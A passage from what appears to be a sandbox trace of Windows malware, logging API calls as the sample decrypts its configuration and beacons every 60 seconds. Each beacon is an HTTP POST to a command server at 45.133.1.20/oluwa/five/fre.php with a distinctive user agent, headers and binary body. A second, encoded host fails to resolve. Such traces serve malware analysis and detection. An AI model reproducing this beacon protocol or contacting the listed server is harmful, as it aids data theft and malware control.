lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0298.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.217] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0298.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.221] CryptDestroyKey (hKey=0x6ad020) returned 1 [0298.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.223] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0298.223] GetProcessHeap () returned 0x6a0000 [0298.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0298.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.224] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0298.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.225] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0298.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.227] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0298.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.228] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0298.228] GetProcessHeap () returned 0x6a0000 [0298.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0298.228] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0298.228] GetProcessHeap () returned 0x6a0000 [0298.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0298.228] socket (af=2, type=1, protocol=6) returned 0xb38 [0298.229] connect (s=0xb38, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0298.258] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0298.258] GetProcessHeap () returned 0x6a0000 [0298.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0298.258] GetProcessHeap () returned 0x6a0000 [0298.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0298.259] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0298.260] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0298.260] GetProcessHeap () returned 0x6a0000 [0298.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db188 [0298.260] GetProcessHeap () returned 0x6a0000 [0298.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0298.261] GetProcessHeap () returned 0x6a0000 [0298.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0298.261] GetProcessHeap () returned 0x6a0000 [0298.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0298.262] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0298.263] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0298.263] GetProcessHeap () returned 0x6a0000 [0298.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0298.265] GetProcessHeap () returned 0x6a0000 [0298.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0298.265] send (s=0xb38, buf=0x6bd460*, len=242, flags=0) returned 242 [0298.266] send (s=0xb38, buf=0x6bb998*, len=159, flags=0) returned 159 [0298.266] GetProcessHeap () returned 0x6a0000 [0298.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0298.266] recv (in: s=0xb38, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0298.335] GetProcessHeap () returned 0x6a0000 [0298.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0298.336] GetProcessHeap () returned 0x6a0000 [0298.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0298.336] GetProcessHeap () returned 0x6a0000 [0298.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db188 | out: hHeap=0x6a0000) returned 1 [0298.337] GetProcessHeap () returned 0x6a0000 [0298.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0298.337] closesocket (s=0xb38) returned 0 [0298.337] GetProcessHeap () returned 0x6a0000 [0298.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0298.338] GetProcessHeap () returned 0x6a0000 [0298.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0298.338] GetProcessHeap () returned 0x6a0000 [0298.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0298.338] GetProcessHeap () returned 0x6a0000 [0298.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0298.339] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1860) returned 0xb38 [0298.342] Sleep (dwMilliseconds=0xea60) [0298.344] GetProcessHeap () returned 0x6a0000 [0298.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0298.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.346] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.353] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0298.365] GetProcessHeap () returned 0x6a0000 [0298.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0298.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.367] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0298.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.368] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.369] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.369] GetProcessHeap () returned 0x6a0000 [0298.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0298.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.371] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0298.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.376] CryptDestroyKey (hKey=0x6ad020) returned 1 [0298.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.383] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0298.383] GetProcessHeap () returned 0x6a0000 [0298.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0298.387] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.387] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0298.388] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.389] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0298.389] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.390] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0298.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.391] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0298.391] GetProcessHeap () returned 0x6a0000 [0298.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0298.391] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0298.391] GetProcessHeap () returned 0x6a0000 [0298.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0298.392] GetProcessHeap () returned 0x6a0000 [0298.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0298.393] GetProcessHeap () returned 0x6a0000 [0298.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0298.393] GetProcessHeap () returned 0x6a0000 [0298.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0298.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.395] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.403] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0298.415] GetProcessHeap () returned 0x6a0000 [0298.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0298.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.416] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0298.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.421] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.422] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.422] GetProcessHeap () returned 0x6a0000 [0298.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0298.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.424] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0298.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.425] CryptDestroyKey (hKey=0x6ad020) returned 1 [0298.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.518] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0298.519] GetProcessHeap () returned 0x6a0000 [0298.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0298.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.520] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0298.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.522] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0298.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.523] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0298.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.526] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0298.526] GetProcessHeap () returned 0x6a0000 [0298.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0298.526] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0298.526] GetProcessHeap () returned 0x6a0000 [0298.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0298.527] socket (af=2, type=1, protocol=6) returned 0xb3c [0298.527] connect (s=0xb3c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0298.653] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0298.653] GetProcessHeap () returned 0x6a0000 [0298.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0298.653] GetProcessHeap () returned 0x6a0000 [0298.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0298.654] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0298.655] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0298.655] GetProcessHeap () returned 0x6a0000 [0298.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da4c8 [0298.655] GetProcessHeap () returned 0x6a0000 [0298.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0298.656] GetProcessHeap () returned 0x6a0000 [0298.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0298.656] GetProcessHeap () returned 0x6a0000 [0298.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0298.657] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0298.659] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0298.659] GetProcessHeap () returned 0x6a0000 [0298.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0298.659] GetProcessHeap () returned 0x6a0000 [0298.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0298.660] send (s=0xb3c, buf=0x6bd460*, len=242, flags=0) returned 242 [0298.662] send (s=0xb3c, buf=0x6bb998*, len=159, flags=0) returned 159 [0298.662] GetProcessHeap () returned 0x6a0000 [0298.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0298.662] recv (in: s=0xb3c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0298.738] GetProcessHeap () returned 0x6a0000 [0298.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0298.739] GetProcessHeap () returned 0x6a0000 [0298.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0298.739] GetProcessHeap () returned 0x6a0000 [0298.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da4c8 | out: hHeap=0x6a0000) returned 1 [0298.739] GetProcessHeap () returned 0x6a0000 [0298.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0298.740] closesocket (s=0xb3c) returned 0 [0298.741] GetProcessHeap () returned 0x6a0000 [0298.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0298.741] GetProcessHeap () returned 0x6a0000 [0298.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0298.741] GetProcessHeap () returned 0x6a0000 [0298.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0298.742] GetProcessHeap () returned 0x6a0000 [0298.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0298.743] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1864) returned 0xb3c [0298.758] Sleep (dwMilliseconds=0xea60) [0298.760] GetProcessHeap () returned 0x6a0000 [0298.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0298.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.761] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.773] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0298.782] GetProcessHeap () returned 0x6a0000 [0298.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0298.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.783] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0298.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.784] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.836] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.836] GetProcessHeap () returned 0x6a0000 [0298.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0298.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.838] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0298.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.840] CryptDestroyKey (hKey=0x6ad020) returned 1 [0298.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.844] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0298.844] GetProcessHeap () returned 0x6a0000 [0298.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0298.844] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.845] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0298.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.846] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0298.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.847] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0298.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.849] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0298.849] GetProcessHeap () returned 0x6a0000 [0298.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0298.849] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0298.849] GetProcessHeap () returned 0x6a0000 [0298.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0298.850] GetProcessHeap () returned 0x6a0000 [0298.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0298.850] GetProcessHeap () returned 0x6a0000 [0298.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0298.850] GetProcessHeap () returned 0x6a0000 [0298.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0298.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.851] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.891] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0298.924] GetProcessHeap () returned 0x6a0000 [0298.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0298.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.928] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0298.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.930] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.931] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.931] GetProcessHeap () returned 0x6a0000 [0298.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0298.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.932] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0298.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.934] CryptDestroyKey (hKey=0x6ad520) returned 1 [0298.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.935] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0298.935] GetProcessHeap () returned 0x6a0000 [0298.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0298.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.936] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0298.937] LoadLibraryW 